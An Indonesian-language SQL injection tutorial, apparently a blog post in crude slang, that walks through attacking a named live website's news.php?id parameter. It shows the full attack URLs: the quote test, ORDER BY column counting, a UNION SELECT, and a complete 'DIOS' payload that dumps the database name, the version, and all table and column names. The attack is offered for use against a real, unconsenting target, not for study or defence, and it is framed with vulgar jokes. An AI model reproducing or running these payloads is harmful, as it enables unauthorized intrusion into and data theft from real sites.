CARA SQLI DENGAN MUDAH
YOYO THE FUCK Halo lammer apa kabarnya baik pasti nya sakit
Ga canda awgawg
Nah kali ini gw bakalan ngasih tau cara sqli biar kalian ga susah payah pass di ajak war sqli tinggal bales aja skill mentok sqli aja bangga nah pasti baperan dia awgawg
Ok langsung saja bahan bahan nya
-Target vuln
-kopi rokok biar mantep
-cewek kalo punya
-kutang janda:v
Target live: https://kansascitynova.org/news.php?id=42
Nah langsung aja ke tutorial nya
Pertama tama cek dulu vuln oa kagak tinggal tambahin ' nah mudah kan
Contoh: https://kansascitynova.org/news.php?id=42'
Kalo vuln ada bacaan error sql syntaq syntaq gituuu yaa
Langsung saja ke tahap ke2
https://kansascitynova.org/news.php?id=42'+order+by+1--+-
https://kansascitynova.org/news.php?id=42'+order+by+2--+-
Seterusnya sampe 100 aja boleh kalo error
Sampai error
Tahap ke 3
Kita cari togel nya oke
https://kansascitynova.org/news.php?id=-42'+union+select+1,2,3,4,5,6,7--+-
Error nya sampe 7 nah buat seperti ituu
Truss klo udah
Nanti ada baca nomor
2
5
Nah gituuu
Jadi disini gw pilih 2
Dan kalian masukin dios nyaa
Dios:
concat(0x496e6a65637465642062792e2f46726565646f6d58706c6f6974,' ">',database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))
Truss kalian ganti no 2 nya seperti dibawah ini
https://kansascitynova.org/news.php?id=-42'+union+select+1,concat(0x496e6a65637465642062792e2f46726565646f6d58706c6f6974,' ">',database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),3,4,5,6,7--+-
Truss langsung aja eksekusi udah kelar
Sekian tutorial dari gw
Sampai ketemu di next tutorial 😊🥰
Komentar